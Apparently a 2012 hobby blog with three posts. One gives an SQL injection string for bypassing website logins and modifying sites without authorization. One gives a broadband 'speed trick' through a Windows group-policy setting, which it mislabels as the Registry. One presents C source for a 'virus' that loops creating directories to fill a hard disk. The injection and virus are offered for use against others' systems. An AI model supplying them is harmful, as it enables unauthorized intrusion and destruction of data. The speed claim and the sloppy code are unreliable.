Monday 29 October 2012

Simple SQL Injection to Login in Any Site

They are many Site's which are have LOop HoOles in there Site .... So by Using Those Loop Holes we can Enter into the Site And can modify any thing in the Site ....... But we Should need a Password to   enter in to the Site which we dont know .... 

So there is a Simple SQL Injection which Allows us to login to a Site ..... So the Code is  ........

Code :   "    'x' or 'x'='x'   " 



This is the Simple Code which should be given Both to the Username And the Password in a Login Forum ....

The Meaning of the Code is that " x or x " i.e (true or true = true )
here the database checks the given code within it and returns true , where we enter into the Database and can do anything in the Site ...

Note :  This Trick is Applicable for Few Sites Only .... 

Sunday 14 October 2012

How To Increase Broadband Speed

They are many ways to Increase your Broadband Speed ..... This is a Simple Trick where you can Increase high Speed Internet ... You just need to follow my Steps ........

Step 1 : Goto Run and type this code " gpedit.msc " 

Step 2 : You will get a Registry and Select " Computer  Configuration " and Expand the [Administrative Templates] > [Network] > [QoS Packet Scheduler] .....


Step 3 :  Now Double-click [Limit Reservable Bandwidth] and you need to [Enabled] it and then Change [Bandwidth limit %] to 0 % and Click [OK] Button.


Step 4 : Now Need to Restart you PC and then Check your Broadband Speed .........

Friday 12 October 2012

Virus That Fills The Hard Disk Entire Space Continously

Hey Folks this is my latest trick ... I have created a new virus that always fill up the HARD DISK space continuously  .... This is a simple C program & use a  Dev cpp Software to compile and Run the Virus which will automatically do its work ...


/* Virus Program Created by ABHI */
#include<stdio.h>
#include<dir.h>                               
#include<conio.h>
int main()
{
 int i=1,flag,count=1;
 char name[30];
 printf("created by ABHI !!!");
 for(i=0;i<1;)
 {
  flag=mkdir(tmpnam(name));
  if(!flag)
  count++;
 }
getch();
return ;
}